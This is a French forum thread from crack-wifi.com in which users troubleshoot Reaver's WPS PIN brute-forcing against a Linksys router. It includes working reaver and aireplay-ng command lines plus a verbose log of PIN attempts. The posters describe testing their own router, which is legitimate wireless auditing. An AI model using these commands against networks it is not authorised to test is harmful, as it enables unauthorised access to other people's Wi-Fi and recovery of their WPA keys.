Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-01-2012 12:39:54

reallife
Membre Indétronable
Inscription : 26-09-2011
Messages : 181

Incompréhension totale à propos de Reaver !!

Salut à tous,

Je suis confronté a un problème hallucinant, et j'avoue qu'après avoir tout essayé je désespère....

Avec mon collègue on a installé Reaver sur son PC portable. On a fait ca dans une machine virtuelle sous VirtualBox avec Backtrack R1 tout fraichement installé.
En tapant la commande : reaver -i mon0 -b 00:25:9C:CA:AC:8A -vv
Reaver trouve parfaitement le code PIN de notre routeur Linksys WRT320N, ainsi que la clé WPA2.
Et le test fonctionne à chaque fois dans 100% des cas. C'est donc vraiment pas mal !

On a donc installé reaver sur les autres machines qu'on a (avec backtrack en dur) et la, au bout de 3 minutes, toujours la même erreur "WPS transaction failed (code: 0x02)" ... On a donc JAMAIS réussi à trouver le PIN autrement qu'avec le laptop de mon collegue...
Ca commence à être bizarre d'autant plus qu'on utilise le même adapteur (alfa awus036h).

Alors j'installe VirtualBox sur MON PC portable, et il me copie l'intégralité de sa machine virtuelle sur laquelle reaver fonctionne parfaitement.
Nos deux laptops sont en Windows 7 64 bits. Je lance donc la machine copiée, et la toujours la même erreur au bout de quelques minutes :

[+] Trying pin 00405676
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.47% complete @ 2012-01-30 10:20:18 (3 seconds/pin)
[+] Trying pin 00415675
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 00415675
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 00415675
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 00415675
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
^C
[+] Session saved.

Totalement incompréhensible, c'est la même machine virtuelle, la même alfa, je ne vois pas du tout ce qui peut clocher....
Et j'aurais bien besoin d'aide....

Merci!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 04-02-2012 00:34:30

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Incompréhension totale à propos de Reaver !!

Je te dirais qu'avec le même adaptateur, sur le même Routeur, à la même distance (à 3 mètres), à deux jours d'intervalles (intervalle dans le quel, je précise n'avoir changé en rien la configuration de mon PC - routeur - dispositifs wireless) Une session sans contre temps ou presque, l'autre pleine de "timeout"; tellement que j'ai préféré arrêté et reprendre la session, ce qui a marché pendant un certain temps, ensuite j'ai arrêté (de nouveau trop de time out à la suite), puis repris etc...

Hors Ligne

#3 04-02-2012 12:05:54

reallife
Membre Indétronable
Inscription : 26-09-2011
Messages : 181

Re : Incompréhension totale à propos de Reaver !!

Donc visiblement je ne suis pas le seul à avoir le problème !

En fait j'avais remarqué ca au début mais je n'osais pas en parler car c'était pas très mathématique comme raisonnement.
C'est à dire qu'une fois ca a falli marcher avec un PC avec une config différente. En fait la seule différence c'est que le routeur avait été éteint pendant plusieurs jours, et je l'ai rallumé pour lancer la manoeuvre.
Je suis alors arrivé à + de 10% puis timeout....
Je l'ai alors redemarré et relancé reaver, et la impossible de dépasser les 1% ...............

Pour que ca marche bien il faudrait donc laisser tranquille le routeur pendant quelques jours ??? Hummmm.....

Hors Ligne

#4 07-02-2012 06:15:46

TAPE
Membre
Inscription : 14-02-2011
Messages : 21

Re : Incompréhension totale à propos de Reaver !!

Il ya surement quelque chose bizar  avec Reaver, mois aussi ca marchait bien avec la version v1.3, mais
v1.4 ne marchait pas due tout.

Pour moi c'etait un cas d'assocation, ce qui j'ai pu faire quand-meme en utilisant aireplay pour l'association;

aireplay-ng mon0 -1 120 -a 00:11:22:33:44:55 -e ESSID 

et puis dans un autre konsole reaver v1.4 ;

reaver -i mon0 -A -c 11 -b 00:11:22:33:44:55 -v 

Quelqu'un d'autre qui a laisse un comment sur mon blog avait dit qu'il a du installer des drivers
compat-wireless "bleeding edge" avant que ca marchait, et puis il avait utilise syntax ;

reaver -i mon0 -L -w -n -vv -c 3 -b 00:00:00:00:00:00 --fail-wait=241

http://adaywithtape.blogspot.com/2012/0 … ility.html

Enfin, peut-etre que ca t'aidera ?

Hors Ligne

#5 07-02-2012 08:07:18

reallife
Membre Indétronable
Inscription : 26-09-2011
Messages : 181

Re : Incompréhension totale à propos de Reaver !!

Je vais essayer ca.

De mon coté j'ai flashé le FW du routeur avec la version 1.5 (derniere), et je suis arrivé jusqu'à 93% avec reaver!!!!!

Hors Ligne

#6 07-02-2012 09:15:34

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Incompréhension totale à propos de Reaver !!

J'ai du mal à me faire une opinion tranchée parceque j'ai quand même obtenus des clefs avec reaver 1.4.
J'ai l'impression qu'avec l'ath5k il n'y pas de problèmes, par contre qu'avec l'ath9k il y a une baisse dans l'efficacité.
Très sincèrement l'ath5k me semble fonctionner comme avant, j'ai plus ou moins une moyenne de 5-8 attempts secondes et le PIN plus le pass au bout du processus.
Là où j'ai des doutes c'est avec l'ath9k.

--fail-wait=241

  La première version de reaver venait avec cette commande intégrée (je crois que le delay était de 300 secondes au lieu de 241)
  Très sympa ton blog TAPE wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Problème reaver par Antho3674
4 302 15-11-2016 22:05:12 par kcdtv
7 313 26-09-2016 15:52:41 par ElliotV
Épinglée :
253 136013 17-09-2016 22:11:01 par Zetta
3 221 01-08-2016 15:53:54 par Olympe
5 731 18-07-2016 23:13:58 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.023 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]